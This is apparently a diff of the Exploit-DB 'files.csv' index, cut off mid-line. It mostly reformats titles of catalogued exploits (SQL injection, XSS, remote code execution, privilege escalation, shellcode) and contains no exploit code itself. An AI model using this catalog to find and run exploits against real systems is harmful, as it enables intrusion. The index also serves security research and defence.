33945,platforms/php/webapps/33945.txt,"DeluxeBB 1.x - 'newpost.php' SQL Injection Vulnerability",2010-05-06,"Stefan Esser",php,webapps,0 33946,platforms/php/webapps/33946.txt,"EmiratesHost Insecure Cookie Authentication Bypass Vulnerability",2010-02-01,jago-dz,php,webapps,0 33947,platforms/php/webapps/33947.txt,"Last Wizardz 'id' Parameter SQL Injection Vulnerability",2010-01-31,"Sec Attack Team",php,webapps,0 @@ -30632,7 +30632,7 @@ id,file,description,date,author,platform,type,port 33987,platforms/php/webapps/33987.txt,"PHP Banner Exchange 1.2 - 'signupconfirm.php' Cross-Site Scripting Vulnerability",2010-01-03,indoushka,php,webapps,0 34112,platforms/windows/local/34112.txt,"Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation",2014-07-19,KoreLogic,windows,local,0 33990,platforms/multiple/remote/33990.rb,"Gitlist Unauthenticated Remote Command Execution",2014-07-07,metasploit,multiple,remote,80 -33991,platforms/php/remote/33991.rb,"Wordpress MailPoet (wysija-newsletters) Unauthenticated File Upload",2014-07-07,metasploit,php,remote,80 +33991,platforms/php/remote/33991.rb,"Wordpress MailPoet - (wysija-newsletters) Unauthenticated File Upload",2014-07-07,metasploit,php,remote,80 33992,platforms/asp/webapps/33992.txt,"Platnik 8.1.1 - Multiple SQL Injection Vulnerabilities",2010-05-17,podatnik386,asp,webapps,0 33993,platforms/php/webapps/33993.txt,"Planet Script 1.x - 'idomains.php' Cross-Site Scripting Vulnerability",2010-05-14,Mr.ThieF,php,webapps,0 33994,platforms/php/webapps/33994.txt,"PonVFTP Insecure Cookie Authentication Bypass Vulnerability",2010-05-17,SkuLL-HackeR,php,webapps,0 @@ -30649,7 +30649,7 @@ id,file,description,date,author,platform,type,port 34007,platforms/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Security Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps,0 34008,platforms/php/webapps/34008.txt,"Percha Multicategory Article Component 0.6 for Joomla! index.php controller Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 34009,platforms/windows/remote/34009.rb,"Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow",2014-07-08,metasploit,windows,remote,20010 -34010,platforms/win32/dos/34010.html,"Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption PoC (MS14-035)",2014-07-08,"Drozdova Liudmila",win32,dos,0 +34010,platforms/win32/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption PoC (MS14-035)",2014-07-08,"Drozdova Liudmila",win32,dos,0 34011,platforms/php/webapps/34011.txt,"Shopzilla Affiliate Script PHP 'search.php' Cross-Site Scripting Vulnerability",2010-05-19,"Andrea Bocchetti",php,webapps,0 34012,platforms/php/webapps/34012.txt,"Caucho Resin Professional 3.1.5 - 'resin-admin/digest.php' Multiple Cross-Site Scripting Vulnerabilities",2010-05-19,xuanmumu,php,webapps,0 34013,platforms/windows/remote/34013.txt,"McAfee Email Gateway 6.7.1 - 'systemWebAdminConfig.do' Remote Security Bypass Vulnerability",2010-05-19,"Nahuel Grisolia",windows,remote,0 @@ -30723,7 +30723,7 @@ id,file,description,date,author,platform,type,port 34082,platforms/php/webapps/34082.txt,"Obsession-Design Image-Gallery 1.1 - 'display.php' Cross-Site Scripting Vulnerability",2010-01-02,kaMtiEz,php,webapps,0 34083,platforms/php/webapps/34083.txt,"Western Digital My Book World Edition 1.1.16 - 'lang' Parameter Cross-Site Scripting Vulnerabilities",2009-12-30,emgent,php,webapps,0 34084,platforms/php/webapps/34084.txt,"L2Web LineWeb 1.0.5 - Multiple Input Validation Vulnerabilities",2010-01-06,"Ignacio Garrido",php,webapps,0 -34085,platforms/php/webapps/34085.txt,"Gigya Socialize Plugin 1.0/1.1.x for Wordpress Cross-Site Scripting Vulnerability",2010-06-04,MustLive,php,webapps,0 +34085,platforms/php/webapps/34085.txt,"Gigya Socialize Plugin 1.0/1.1.x for Wordpress - Cross-Site Scripting Vulnerability",2010-06-04,MustLive,php,webapps,0 34137,platforms/php/webapps/34137.txt,"Joomla! 'com_videowhisper_2wvc' Component Cross-Site Scripting Vulnerability",2010-06-10,Sid3^effects,php,webapps,0 34088,platforms/android/remote/34088.html,"Boat Browser 8.0 and 8.0.1 - Remote Code Execution Vulnerability",2014-07-16,c0otlass,android,remote,0 34089,platforms/php/webapps/34089.txt,"Bilboplanet 2.0 - Multiple XSS Vulnerabilities",2014-07-16,"Vivek N",php,webapps,80 @@ -30809,7 +30809,7 @@ id,file,description,date,author,platform,type,port 34191,platforms/php/remote/34191.py,"Oxwall 1.7.0 - Remote Code Execution Exploit",2014-07-28,LiquidWorm,php,remote,80 34192,platforms/linux/remote/34192.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - XSLT Integer Overflow Vulnerability",2010-06-22,"Martin Barbella",linux,remote,0 34194,platforms/asp/webapps/34194.txt,"Lois Software WebDB 2.0A Script Multiple SQL Injection Vulnerabilities",2010-06-24,"High-Tech Bridge SA",asp,webapps,0 -34195,platforms/php/webapps/34195.txt,"Cimy Counter for WordPress 0.9.4 HTTP Response Splitting and Cross-Site Scripting Vulnerabilities",2010-05-05,MustLive,php,webapps,0 +34195,platforms/php/webapps/34195.txt,"Cimy Counter for WordPress 0.9.4 - HTTP Response Splitting and Cross-Site Scripting Vulnerabilities",2010-05-05,MustLive,php,webapps,0 34196,platforms/ios/webapps/34196.txt,"WiFi HD 7.3.0 iOS - Multiple Vulnerabilities",2014-07-29,Vulnerability-Lab,ios,webapps,0 34197,platforms/php/webapps/34197.txt,"AbleSpace 1.0 - 'news.php' SQL Injection Vulnerability",2010-06-25,JaMbA,php,webapps,0 34198,platforms/php/webapps/34198.txt,"Limny 2.1 - 'q' Parameter Cross-Site Scripting Vulnerability",2010-06-24,"High-Tech Bridge SA",php,webapps,0 @@ -30854,7 +30854,7 @@ id,file,description,date,author,platform,type,port 34239,platforms/php/webapps/34239.txt,"Status2k Server Monitoring Software - Multiple Vulnerabilities",2014-08-02,"Shayan S",php,webapps,80 34240,platforms/ios/webapps/34240.txt,"TigerCom iFolder+ 1.2 iOS - Multiple Vulnerabilities",2014-08-02,Vulnerability-Lab,ios,webapps,8080 34241,platforms/linux/webapps/34241.txt,"ISPConfig 3.0.54p1 - Authenticated Admin Local Root Vulnerability",2014-08-02,mra,linux,webapps,8080 -34336,platforms/php/webapps/34336.html,"Disqus for Wordpress 2.7.5 Admin Stored CSRF and XSS",2014-08-14,"Nik Cubrilovic",php,webapps,80 +34336,platforms/php/webapps/34336.html,"Disqus for Wordpress 2.7.5 - Admin Stored CSRF and XSS",2014-08-14,"Nik Cubrilovic",php,webapps,80 34337,platforms/php/webapps/34337.txt,"Gekko Web Builder 9.0 - 'index.php' Cross-Site Scripting Vulnerability",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34338,platforms/php/webapps/34338.html,"Pixie 1.0.4 HTML Injection and Cross-Site Scripting Vulnerabilities",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34243,platforms/ios/webapps/34243.txt,"Photo WiFi Transfer 1.01 - Directory Traversal Vulnerability",2014-08-02,Vulnerability-Lab,ios,webapps,8080 @@ -31050,7 +31050,7 @@ id,file,description,date,author,platform,type,port 34454,platforms/php/webapps/34454.txt,"PaoBacheca 2.1 scrivi.php URI XSS",2009-09-16,Moudi,php,webapps,0 34455,platforms/php/webapps/34455.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection Vulnerabilities",2010-08-12,Affix,php,webapps,0 34457,platforms/multiple/dos/34457.txt,"Sniper Elite 1.0 - NULL Pointer Dereference Denial Of Service Vulnerability",2009-08-14,"Luigi Auriemma",multiple,dos,0 -34458,platforms/windows/dos/34458.html,"Internet Explorer - Memory Corruption PoC (MS14-029)",2014-08-28,PhysicalDrive0,windows,dos,0 +34458,platforms/windows/dos/34458.html,"Microsoft Internet Explorer - Memory Corruption PoC (MS14-029)",2014-08-28,PhysicalDrive0,windows,dos,0 34459,platforms/php/webapps/34459.txt,"Amiro.CMS 5.4 - Multiple Input Validation Vulnerabilities",2009-10-19,"Vladimir Vorontsov",php,webapps,0 34460,platforms/windows/dos/34460.py,"Sonique 2.0 - (.xpl) Remote Stack-Based Buffer Overflow Vulnerability",2010-08-12,"Hamza_hack_dz & Black-liondz1",windows,dos,0 34461,platforms/multiple/remote/34461.py,"NRPE 2.15 - Remote Code Execution Vulnerability",2014-08-29,"Claudio Viviani",multiple,remote,0 @@ -31118,7 +31118,7 @@ id,file,description,date,author,platform,type,port 34535,platforms/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 - Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0 34536,platforms/php/webapps/34536.txt,"CompuCMS - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0 34537,platforms/linux/local/34537.txt,"EncFS 1.6.0 - Flawed CBC/CFB Cryptography Implementation Weaknesses",2010-08-26,"Micha Riser",linux,local,0 -34538,platforms/php/webapps/34538.txt,"Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability",2014-09-05,Hannaichi,php,webapps,80 +34538,platforms/php/webapps/34538.txt,"Wordpress Plugins Premium Gallery Manager - Unauthenticated Configuration Access Vulnerability",2014-09-05,Hannaichi,php,webapps,80 34539,platforms/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Stored XSS",2014-09-05,"Fikri Fadzil",php,webapps,80 34540,platforms/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit",2014-09-05,"Robert Kugler",windows,dos,0 34541,platforms/php/webapps/34541.txt,"WebsiteKit Gbplus Name and Body Fields HTML Injection Vulnerabilities",2010-08-29,MiND,php,webapps,0 @@ -31367,12 +31367,12 @@ id,file,description,date,author,platform,type,port 34812,platforms/php/webapps/34812.html,"Docebo 3.6 - 'description' Parameter Cross-Site Scripting Vulnerability",2010-10-04,"High-Tech Bridge SA",php,webapps,0 34813,platforms/php/webapps/34813.txt,"Elxis 2009.2 rev2631 SQL Injection",2010-10-05,"High-Tech Bridge SA",php,webapps,0 34814,platforms/php/webapps/34814.txt,"SquirrelMail Virtual Keyboard Plugin 'vkeyboard.php' Cross-Site Scripting Vulnerability",2010-10-05,"Moritz Naumann",php,webapps,0 -34815,platforms/windows/remote/34815.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR_ DEP & EMET 5.0 Bypass (MS12-037)",2014-09-29,"ryujin & sickness",windows,remote,0 +34815,platforms/windows/remote/34815.html,"Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR_ DEP & EMET 5.0 Bypass (MS12-037)",2014-09-29,"ryujin & sickness",windows,remote,0 34820,platforms/php/webapps/34820.pl,"Joomla Club Manager Component - 'cm_id' Parameter SQL Injection Vulnerability",2010-10-06,FL0RiX,php,webapps,0 34817,platforms/windows/webapps/34817.rb,"Microsoft Exchange IIS HTTP Internal IP Address Disclosure",2014-09-29,"Nate Power",windows,webapps,0 34818,platforms/php/webapps/34818.html,"OpenFiler 2.99.1 - CSRF Vulnerability",2014-09-29,"Dolev Farhi",php,webapps,446 34975,platforms/php/webapps/34975.txt,"SEO Tools Plugin for WordPress 3.0 - 'file' Parameter Directory Traversal Vulnerability",2010-11-08,"John Leitch",php,webapps,0 -34976,platforms/php/webapps/34976.txt,"Vodpod Video Gallery 3.1.5 for WordPress 'vodpod_gallery_thumbs.php' Cross-Site Scripting Vulnerability",2010-11-08,"John Leitch",php,webapps,0 +34976,platforms/php/webapps/34976.txt,"Vodpod Video Gallery 3.1.5 for WordPress - 'vodpod_gallery_thumbs.php' Cross-Site Scripting Vulnerability",2010-11-08,"John Leitch",php,webapps,0 34977,platforms/php/webapps/34977.txt,"WordPress jRSS Widget Plugin 1.1.1 - 'url' Parameter Information Disclosure Vulnerability",2010-11-08,"John Leitch",php,webapps,0 34827,platforms/php/webapps/34827.txt,"Recipe Script 5.0 - 'First Name' HTML Injection",2009-06-15,"ThE g0bL!N",php,webapps,0 34828,platforms/php/webapps/34828.txt,"Backbone Technology Expression 18.9.2010 - Cross-Site Scripting Vulnerabilities",2010-10-06,"High-Tech Bridge SA",php,webapps,0 @@ -31466,7 +31466,7 @@ id,file,description,date,author,platform,type,port 34919,platforms/php/webapps/34919.txt,"SkyBlueCanvas 1.1 r237 - 'admin.php' Directory Traversal Vulnerability",2009-07-16,MaXe,php,webapps,0 34920,platforms/asp/webapps/34920.txt,"HttpCombiner ASP.NET - Remote File Disclosure Vulnerability",2014-10-07,"Le Ngoc Son",asp,webapps,0 34921,platforms/windows/local/34921.pl,"Asx to Mp3 2.7.5 - Stack Overflow",2014-10-07,"Amir Tavakolian",windows,local,0 -34925,platforms/php/remote/34925.rb,"Wordpress InfusionSoft Plugin Upload Vulnerability",2014-10-09,metasploit,php,remote,80 +34925,platforms/php/remote/34925.rb,"Wordpress InfusionSoft Plugin - Upload Vulnerability",2014-10-09,metasploit,php,remote,80 34926,platforms/windows/remote/34926.rb,"Rejetto HttpFileServer Remote Command Execution",2014-10-09,metasploit,windows,remote,80 34927,platforms/unix/remote/34927.rb,"F5 iControl Remote Root Command Execution",2014-10-09,metasploit,unix,remote,443 34928,platforms/jsp/webapps/34928.txt,"DrayTek VigorACS SI 1.3.0 - Multiple Vulnerabilities",2014-10-09,"Digital Misfits",jsp,webapps,0 @@ -31516,7 +31516,7 @@ id,file,description,date,author,platform,type,port 34971,platforms/asp/webapps/34971.txt,"Angel Learning Management System 7.3 - 'pdaview.asp' Cross-Site Scripting Vulnerability",2010-11-05,"Wesley Kerfoot",asp,webapps,0 34972,platforms/php/webapps/34972.txt,"Joomla! AutoArticles 3000 - 'id' Parameter SQL Injection Vulnerability",2010-11-05,jos_ali_joe,php,webapps,0 34973,platforms/php/webapps/34973.txt,"FeedList 2.61.01 for WordPress - 'handler_image.php' Cross-Site Scripting Vulnerability",2010-11-08,"John Leitch",php,webapps,0 -34974,platforms/php/webapps/34974.txt,"WP Survey And Quiz Tool 1.2.1 for WordPress Cross-Site Scripting Vulnerability",2010-11-08,"John Leitch",php,webapps,0 +34974,platforms/php/webapps/34974.txt,"WP Survey And Quiz Tool 1.2.1 for WordPress - Cross-Site Scripting Vulnerability",2010-11-08,"John Leitch",php,webapps,0 34982,platforms/win32/local/34982.rb,"Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation",2014-10-15,metasploit,win32,local,0 34994,platforms/cgi/webapps/34994.txt,"OpenWrt 10.03 - Multiple Cross-Site Scripting Vulnerabilities",2010-11-13,"dave b",cgi,webapps,0 34995,platforms/php/webapps/34995.txt,"Simea CMS 'index.php' SQL Injection Vulnerability",2010-11-16,Cru3l.b0y,php,webapps,0 @@ -31550,7 +31550,7 @@ id,file,description,date,author,platform,type,port 35015,platforms/cgi/webapps/35015.txt,"SimpLISTic SQL 2.0 - 'email.cgi' Cross-Site Scripting Vulnerability",2010-11-24,"Aliaksandr Hartsuyeu",cgi,webapps,0 35016,platforms/php/webapps/35016.txt,"Easy Banner 2009.05.18 member.php Multiple Parameter SQL Injection Authentication Bypass",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps,0 35017,platforms/php/webapps/35017.txt,"Easy Banner 2009.05.18 index.php Multiple Parameter XSS",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps,0 -35018,platforms/linux/remote/35018.c,"Aireplay-ng 1.2 beta3 - ""tcp_test"" Length Parameter Stack Overflow",2014-10-20,"Nick Sampanis",linux,remote,0 +35018,platforms/linux/remote/35018.c,"Aireplay-ng 1.2 beta3 - _tcp_test_ Length Parameter Stack Overflow",2014-10-20,"Nick Sampanis",linux,remote,0 35019,platforms/windows/local/35019.py,"Windows OLE Package Manager SandWorm Exploit",2014-10-20,"Vlad Ovtchinikov",windows,local,0 35020,platforms/win32/local/35020.rb,"MS14-060 Microsoft Windows OLE Package Manager Code Execution",2014-10-20,metasploit,win32,local,0 35021,platforms/linux/local/35021.rb,"Linux PolicyKit Race Condition Privilege Escalation",2014-10-20,metasploit,linux,local,0 @@ -31581,7 +31581,7 @@ id,file,description,date,author,platform,type,port 35051,platforms/windows/remote/35051.txt,"Freefloat FTP Server Directory Traversal Vulnerability",2010-12-06,Pr0T3cT10n,windows,remote,0 35052,platforms/php/webapps/35052.txt,"Magento Server MAGMI Plugin - Remote File Inclusion (RFI)",2014-10-25,"Parvinder Bhasin",php,webapps,0 35566,platforms/php/webapps/35566.txt,"Yaws-Wiki 1.88-1 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2011-04-04,"Michael Brooks",php,webapps,0 -35055,platforms/windows/remote/35055.py,"Windows OLE - Remote Code Execution ""Sandworm"" Exploit (MS14-060)",2014-10-25,"Mike Czumak",windows,remote,0 +35055,platforms/windows/remote/35055.py,"Windows OLE - Remote Code Execution _Sandworm_ Exploit (MS14-060)",2014-10-25,"Mike Czumak",windows,remote,0 35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Directory Traversal",2014-10-25,"XLabs Security",hardware,webapps,0 35057,platforms/php/webapps/35057.py,"Creative Contact Form (Wordpress 0.9.7 and Joomla 2.0.0) - Shell Upload Vulnerability",2014-10-25,"Claudio Viviani",php,webapps,0 35058,platforms/bsd/dos/35058.c,"OpenBSD <= 5.5 - Local Kernel Panic",2014-10-25,nitr0us,bsd,dos,0 @@ -31594,7 +31594,7 @@ id,file,description,date,author,platform,type,port 35064,platforms/php/webapps/35064.txt,"Zimplit CMS English_manual_version_2.php client Parameter XSS",2010-12-07,"High-Tech Bridge SA",php,webapps,0 35065,platforms/asp/webapps/35065.txt,"SolarWinds Orion Network Performance Monitor (NPM) 10.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-07,x0skel,asp,webapps,0 35066,platforms/php/webapps/35066.txt,"WordPress Processing Embed Plugin 0.5 - 'pluginurl' Parameter Cross-Site Scripting Vulnerability",2010-12-08,"John Leitch",php,webapps,0 -35067,platforms/php/webapps/35067.txt,"WordPress Safe Search Plugin 'v1' Parameter Cross-Site Scripting Vulnerability",2010-12-08,"John Leitch",php,webapps,0 +35067,platforms/php/webapps/35067.txt,"WordPress Safe Search Plugin 'v1' Parameter - Cross-Site Scripting Vulnerability",2010-12-08,"John Leitch",php,webapps,0 35068,platforms/hardware/remote/35068.txt,"pfSense pkg_edit.php id Parameter XSS",2010-11-08,"dave b",hardware,remote,0 35069,platforms/hardware/remote/35069.txt,"pfSense pkg.php xml Parameter XSS",2010-11-08,"dave b",hardware,remote,0 35070,platforms/hardware/remote/35070.txt,"pfSense status_graph.php if Parameter XSS",2010-11-08,"dave b",hardware,remote,0 @@ -31611,7 +31611,7 @@ id,file,description,date,author,platform,type,port 35081,platforms/linux/dos/35081.txt,"Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash",2014-10-27,"Michal Zalewski",linux,dos,0 35082,platforms/ios/webapps/35082.txt,"WebDisk+ 2.1 iOS - Code Execution Vulnerability",2014-10-27,Vulnerability-Lab,ios,webapps,1861 35083,platforms/ios/webapps/35083.txt,"Folder Plus 2.5.1 iOS - Persistent XSS Vulnerability",2014-10-27,Vulnerability-Lab,ios,webapps,0 -35084,platforms/php/webapps/35084.txt,"WordPress Twitter Feed Plugin 'url' Parameter Cross-Site Scripting Vulnerability",2010-12-07,"John Leitch",php,webapps,0 +35084,platforms/php/webapps/35084.txt,"WordPress Twitter Feed Plugin 'url' Parameter - Cross-Site Scripting Vulnerability",2010-12-07,"John Leitch",php,webapps,0 35085,platforms/cgi/webapps/35085.txt,"WWWThread 5.0.8 Pro 'showflat.pl' Cross-Site Scripting Vulnerability",2010-12-09,"Aliaksandr Hartsuyeu",cgi,webapps,0 35086,platforms/multiple/dos/35086.rb,"Allegro RomPager 4.07 UPnP HTTP Request Remote Denial of Service Vulnerability.",2010-12-08,"Ricky-Lee Birtles",multiple,dos,0 35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 (stable) 'admin1.template.php' Local and Remote File Include Vulnerabilities",2010-12-09,"Marcin Ressel",php,webapps,0 @@ -31660,7 +31660,7 @@ id,file,description,date,author,platform,type,port 35130,platforms/windows/remote/35130.txt,"Calibre 0.7.34 - Cross-Site Scripting and Directory Traversal Vulnerabilities",2010-12-21,waraxe,windows,remote,0 35131,platforms/php/webapps/35131.txt,"Social Share 'username' Parameter SQL Injection Vulnerability",2010-12-21,"Aliaksandr Hartsuyeu",php,webapps,0 35132,platforms/linux/remote/35132.txt,"Mitel Audio and Web Conferencing (AWC) Remote Arbitrary Shell Command Injection Vulnerability",2010-12-21,"Jan Fry",linux,remote,0 -35133,platforms/php/webapps/35133.txt,"Mediatricks Viva Thumbs Plugin for WordPress Multiple Information Disclosure Vulnerabilities",2010-12-21,"Richard Brain",php,webapps,0 +35133,platforms/php/webapps/35133.txt,"Mediatricks Viva Thumbs Plugin for WordPress - Multiple Information Disclosure Vulnerabilities",2010-12-21,"Richard Brain",php,webapps,0 35134,platforms/php/webapps/35134.txt,"ImpressCMS 1.2.x - 'quicksearch_ContentContent' Parameter HTML Injection Vulnerability",2010-12-21,"High-Tech Bridge SA",php,webapps,0 35135,platforms/php/webapps/35135.txt,"Classified Component for Joomla! SQL Injection Vulnerability",2010-12-22,R4dc0re,php,webapps,0 35136,platforms/php/webapps/35136.txt,"WordPress Accept Signups Plugin 0.1 - 'email' Parameter Cross-Site Scripting Vulnerability",2010-12-22,clshack,php,webapps,0 @@ -31677,7 +31677,7 @@ id,file,description,date,author,platform,type,port 35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business Directory Traversal Vulnerability",2010-12-24,anonymous,linux,remote,0 35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting Vulnerability",2010-12-27,"Ulisses Castro",php,webapps,0 35150,platforms/php/webapps/35150.php,"Drupal < 7.32 Pre Auth SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443 -35151,platforms/hardware/remote/35151.rb,"Xerox Multifunction Printers (MFP) ""Patch"" DLM Vulnerability",2014-11-03,metasploit,hardware,remote,9100 +35151,platforms/hardware/remote/35151.rb,"Xerox Multifunction Printers (MFP) _Patch_ DLM Vulnerability",2014-11-03,metasploit,hardware,remote,9100 35153,platforms/osx/dos/35153.c,"Mac OS X Mavericks IOBluetoothHCIUserClient Privilege Escalation",2014-11-03,"rpaleari and joystick",osx,dos,0 35154,platforms/asp/webapps/35154.txt,"Sigma Portal 'ShowObjectPicture.aspx' Denial of Service Vulnerability",2010-12-27,"Pouya Daneshmand",asp,webapps,0 35155,platforms/php/webapps/35155.txt,"CruxCMS 3.0 - Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,php,webapps,0 @@ -31719,9 +31719,9 @@ id,file,description,date,author,platform,type,port 35197,platforms/php/webapps/35197.txt,"Serenity Client Management Portal 1.0.1 - Multiple Vulnerabilities",2014-11-10,"Halil Dalabasmaz",php,webapps,0 35198,platforms/php/webapps/35198.txt,"phpSound Music Sharing Platform 1.0.5 - Multiple XSS Vulnerabilities",2014-11-10,"Halil Dalabasmaz",php,webapps,0 35210,platforms/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",multiple,webapps,0 -35202,platforms/windows/dos/35202.py,"Internet Explorer 11 - Denial Of Service",2014-11-10,"Behrooz Abbassi",windows,dos,0 +35202,platforms/windows/dos/35202.py,"Microsoft Internet Explorer 11 - Denial Of Service",2014-11-10,"Behrooz Abbassi",windows,dos,0 35203,platforms/hardware/webapps/35203.txt,"ZTE ZXDSL 831CII - Insecure Direct Object Reference",2014-11-10,"Paulos Yibelo",hardware,webapps,0 -35205,platforms/linux/shellcode/35205.txt,"Position independent & Alphanumeric 64-bit execve(""/bin/sh\0""_NULL_NULL); (87 bytes)",2014-11-10,Breaking.Technology,linux,shellcode,0 +35205,platforms/linux/shellcode/35205.txt,"Position independent & Alphanumeric 64-bit execve(_/bin/sh\0__NULL_NULL); (87 bytes)",2014-11-10,Breaking.Technology,linux,shellcode,0 35204,platforms/php/webapps/35204.txt,"Another Wordpress Classifieds Plugin - SQL Injection",2014-11-10,dill,php,webapps,0 35206,platforms/php/webapps/35206.txt,"PHP-Fusion 7.02.07 - SQL Injection",2014-11-10,"XLabs Security",php,webapps,0 35313,platforms/php/webapps/35313.txt,"Wordpress SP Client Document Manager Plugin 2.4.1 - SQL Injection",2014-11-21,"ITAS Team",php,webapps,80 @@ -31745,8 +31745,8 @@ id,file,description,date,author,platform,type,port 35226,platforms/windows/remote/35226.py,"Avira AntiVir Personal Multiple Code Execution Vulnerabilities (2)",2011-01-14,D.Elser,windows,remote,0 35227,platforms/php/webapps/35227.txt,"Alguest 1.1c-patched 'elimina' Parameter SQL Injection Vulnerability",2011-01-14,"Aliaksandr Hartsuyeu",php,webapps,0 35228,platforms/php/webapps/35228.txt,"CompactCMS 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-01-15,NLSecurity,php,webapps,0 -35229,platforms/windows/remote/35229.html,"Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1)",2014-11-13,yuange,windows,remote,0 -35230,platforms/windows/remote/35230.rb,"Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF)",2014-11-13,"Wesley Neelen & Rik van Duijn",windows,remote,0 +35229,platforms/windows/remote/35229.html,"Microsoft Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1)",2014-11-13,yuange,windows,remote,0 +35230,platforms/windows/remote/35230.rb,"Microsoft Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF)",2014-11-13,"Wesley Neelen & Rik van Duijn",windows,remote,0 35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System 2.9.2 - 'oid' Parameter SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0 35232,platforms/linux/remote/35232.txt,"Pango Font Parsing 'pangoft2-render.c' Heap Corruption Vulnerability",2011-01-18,"Dan Rosenberg",linux,remote,0 35233,platforms/multiple/webapps/35233.txt,"B-Cumulus 'tagcloud' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,multiple,webapps,0 @@ -31773,7 +31773,7 @@ id,file,description,date,author,platform,type,port 35253,platforms/php/webapps/35253.txt,"web@all 1.1 - 'url' Parameter Cross-Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 35254,platforms/php/webapps/35254.txt,"PivotX 2.2.2 - 'module_image.php' Cross-Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 35255,platforms/php/webapps/35255.txt,"WordPress Uploader Plugin 1.0 - 'num' Parameter Cross-Site Scripting Vulnerability",2011-01-24,"AutoSec Tools",php,webapps,0 -35273,platforms/windows/remote/35273.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR_ DEP & EMET 5.1 Bypass (MS12-037)",2014-11-17,"ryujin & sickness",windows,remote,0 +35273,platforms/windows/remote/35273.html,"Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR_ DEP & EMET 5.1 Bypass (MS12-037)",2014-11-17,"ryujin & sickness",windows,remote,0 35256,platforms/cfm/webapps/35256.txt,"ActiveWeb Professional 3.0 - Arbitrary File Upload Vulnerability",2011-01-25,StenoPlasma,cfm,webapps,0 35257,platforms/php/webapps/35257.txt,"WordPress Videox7 UGC Plugin 2.5.3.2 - 'listid' Parameter Cross-Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 35258,platforms/php/webapps/35258.txt,"WordPress Audio Plugin 0.5.1 - 'showfile' Parameter Cross-Site Scripting Vulnerability",2011-01-23,"AutoSec Tools",php,webapps,0 @@ -31788,7 +31788,7 @@ id,file,description,date,author,platform,type,port 35272,platforms/hardware/webapps/35272.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,0 35271,platforms/php/webapps/35271.txt,"Maarch LetterBox 2.8 - Insecure Cookies (Login Bypass)",2014-11-17,"ZoRLu Bugrahan",php,webapps,0 35284,platforms/multiple/remote/35284.pl,"Opera Web Browser 11.00 - 'option' HTML Element Integer Overflow Vulnerability",2011-01-25,"C4SS!0 G0M3S",multiple,remote,0 -35285,platforms/php/webapps/35285.txt,"WordPress Feature Slideshow Plugin 1.0.6 \'src\' Parameter Cross-Site Scripting Vulnerability",2011-01-24,"AutoSec Tools",php,webapps,0 +35285,platforms/php/webapps/35285.txt,"WordPress Feature Slideshow Plugin 1.0.6 - \'src\' Parameter Cross-Site Scripting Vulnerability",2011-01-24,"AutoSec Tools",php,webapps,0 35286,platforms/php/webapps/35286.txt,"WordPress BezahlCode Generator Plugin 1.0 - 'gen_name' Parameter Cross-Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 35287,platforms/php/webapps/35287.txt,"Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting Vulnerability",2011-01-24,"AutoSec Tools",php,webapps,0 35274,platforms/php/webapps/35274.txt,"PHPFox - Stored XSS Vulnerability",2014-11-17,spyk2r,php,webapps,80 @@ -31809,7 +31809,7 @@ id,file,description,date,author,platform,type,port 35305,platforms/php/webapps/35305.txt,"ACollab 't' Parameter SQL Injection Vulnerability",2011-02-01,"AutoSec Tools",php,webapps,0 35306,platforms/php/webapps/35306.txt,"TCExam 11.1.16 - 'user_password' Parameter Cross-Site Scripting Vulnerability",2011-02-02,"AutoSec Tools",php,webapps,0 35307,platforms/php/webapps/35307.py,"All In One Control Panel 1.4.1 - 'cp_menu_data_file.php' SQL Injection Vulnerability",2011-01-31,"AutoSec 